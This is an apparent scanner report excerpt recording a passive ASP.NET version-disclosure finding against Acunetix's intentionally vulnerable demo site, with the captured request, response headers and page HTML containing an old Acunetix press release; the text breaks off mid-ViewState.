bnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3M